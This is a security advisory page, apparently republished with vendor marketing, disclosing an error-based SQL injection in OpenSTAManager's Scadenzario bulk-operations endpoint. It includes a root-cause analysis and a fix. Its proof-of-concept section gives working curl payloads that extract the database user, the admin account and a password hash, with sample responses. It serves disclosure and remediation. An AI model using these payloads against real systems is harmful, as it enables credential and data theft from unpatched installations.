GHSA-4xwv-49c8-fvhq
OpenSTAManager has a SQL Injection vulnerability in the Scadenzario bulk operations module
EPSS Exploitation Probability
EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.
Blast Radius
devcode-it/openstamanagerReal-time download stats are indexed for npm and PyPI packages. This vulnerability affects Packagist packages — download data is not available via public APIs for these ecosystems.
Description
Summary
Critical Error-Based SQL Injection vulnerability in the Scadenzario (Payment Schedule) bulk operations module of OpenSTAManager v2.9.8 allows authenticated attackers to extract complete database contents including user credentials, customer PII, and financial records through XML error messages.
Status: ✅ Confirmed and tested on live instance (v2.9.8)
Vulnerable Parameter: id_records[] (POST array)
Affected Endpoint: /actions.php?id_module=18 (Scadenzario module)
Attack Type: Error-Based SQL Injection (IN clause)
Details
OpenSTAManager v2.9.8 contains a critical Error-Based SQL Injection vulnerability in the bulk operations handler for the Scadenzario (Payment Schedule) module. The application fails to validate that elements of the id_records array are integers before using them in an SQL IN() clause, allowing attackers to inject arbitrary SQL commands and extract sensitive data through XPATH error messages.
Vulnerability Chain:
-
Entry Point:
/actions.php(Lines 503-506)$id_records = post('id_records'); $id_records = is_array($id_records) ? $id_records : explode(';', $id_records); $id_records = array_clean($id_records); $id_records = array_unique($id_records);The
array_clean()function only removes empty values - it does NOT validate types. -
Vulnerable Function:
/lib/util.php(Lines 54-60)function array_clean($array) { if (!empty($array)) { return array_unique(array_values(array_filter($array, fn ($value) => !empty($value)))); } }Impact: The function filters out empty values but accepts any non-empty value, including SQL Injection payloads.
-
SQL Injection Point:
/modules/scadenzario/bulk.php(Line 88) PRIMARY VULNERABILITY$scadenze = $database->FetchArray('SELECT * FROM co_scadenziario LEFT JOIN (SELECT id as id_nota, ref_documento FROM co_documenti)as nota ON co_scadenziario.iddocumento = nota.ref_documento WHERE co_scadenziario.id IN ('.implode(',', $id_records).') AND pagato < da_pagare AND nota.id_nota IS NULL ORDER BY idanagrafica, iddocumento');Impact: Array elements from
$id_recordsare directly concatenated usingimplode()without type validation orprepare(), enabling full SQL Injection.
Root Cause Analysis:
The vulnerability exists because:
post('id_records')returns user-controlled arrayarray_clean()only removes empty values, not non-integer valuesimplode(',', $id_records)concatenates array elements directly into SQL- No validation ensures array elements are integers
- Attacker can inject SQL by providing:
id_records[]=1&id_records[]=(MALICIOUS SQL)#
Affected Code Path:
POST /actions.php?id_module=18
↓
actions.php:503 - $id_records = post('id_records')
↓
actions.php:505 - $id_records = array_clean($id_records) [NO TYPE VALIDATION]
↓
actions.php:509 - include 'modules/scadenzario/bulk.php'
↓
bulk.php:88 - WHERE id IN ('.implode(',', $id_records).') [INJECTION POINT]
PoC
Step 1: Login
curl -c cookies.txt -X POST 'http://localhost:8081/index.php?op=login' \
-d 'username=admin&password=admin'
Step 2: Verify Vulnerability (Error-Based SQL Injection)
Test 1: Extract Database User and Version
curl -b cookies.txt \
-d "op=send_reminder&id_records[]=-999) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT CONCAT(USER(),' | ',VERSION()))))%23" \
"http://localhost:8081/actions.php?id_module=18"
Response (error message visible to attacker):
<code>XPATH syntax error: '~osm@localhost | 8.0.40-0ubuntu0.22.04.1'</code>
Test 2: Extract Admin Credentials
curl -b cookies.txt \
-d "op=send_reminder&id_records[]=-999) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT CONCAT(username,':',email) FROM zz_users LIMIT 1)))%23" \
"http://localhost:8081/actions.php?id_module=18"
Response:
<code>XPATH syntax error: '~admin:[email protected]'</code>
Test 3: Extract Password Hash (Part 1 - first 31 chars)
curl -b cookies.txt \
-d "op=send_reminder&id_records[]=-999) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT SUBSTRING(password,1,31) FROM zz_users LIMIT 1)))%23" \
"http://localhost:8081/actions.php?id_module=18"
Response:
<code>XPATH syntax error: '~$2y$10$UUPECY1DhQXm2pGEq/UNAeMd'</code>
Test 4: Extract Password Hash (Part 2 - chars 32-60)
curl -b cookies.txt \
-d "op=send_reminder&id_records[]=-999) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT SUBSTRING(password,32,60) FROM zz_users LIMIT 1)))%23" \
"http://localhost:8081/actions.php?id_module=18"
Response:
<code>XPATH syntax error: '~SoqiRNefN.G9fYMVnCRcvmG0BnwTK'</code>
Combined Password Hash:
$2y$10$UUPECY1DhQXm2pGEq/UNAeMdSoqiRNefN.G9fYMVnCRcvmG0BnwTK
Impact
**All authenticated users with access to the Scadenzario (Payment Schedule) module bulk operations.
Recommended Fix:
Primary Fix - Type Validation:
File: /modules/scadenzario/bulk.php
BEFORE (Vulnerable - Line 88):
$scadenze = $database->FetchArray('SELECT * FROM co_scadenziario LEFT JOIN (SELECT id as id_nota, ref_documento FROM co_documenti)as nota ON co_scadenziario.iddocumento = nota.ref_documento WHERE co_scadenziario.id IN ('.implode(',', $id_records).') AND pagato < da_pagare AND nota.id_nota IS NULL ORDER BY idanagrafica, iddocumento');
AFTER (Fixed):
// Validate that all array elements are integers
$id_records = array_map('intval', $id_records);
$id_records = array_filter($id_records, fn($id) => $id > 0); // Remove zero/negative IDs
$scadenze = $database->FetchArray('SELECT * FROM co_scadenziario LEFT JOIN (SELECT id as id_nota, ref_documento FROM co_documenti)as nota ON co_scadenziario.iddocumento = nota.ref_documento WHERE co_scadenziario.id IN ('.implode(',', $id_records).') AND pagato < da_pagare AND nota.id_nota IS NULL ORDER BY idanagrafica, iddocumento');
Credits
Discovered by Łukasz Rybak
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 🐘Packagist | devcode-it/openstamanager | all versions | No fix |
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for devcode-it/openstamanager. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Remediation status
No patched version of devcode-it/openstamanager has shipped for GHSA-4xwv-49c8-fvhq yet. Where your build allows, override or pin the dependency away from the vulnerable range, and apply any maintainer-recommended mitigation.
Mitigate without a patch
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-4xwv-49c8-fvhq is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.
Tailored to GHSA-4xwv-49c8-fvhq. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is GHSA-4xwv-49c8-fvhq in your dependencies?
O3 detects GHSA-4xwv-49c8-fvhq across Packagist dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.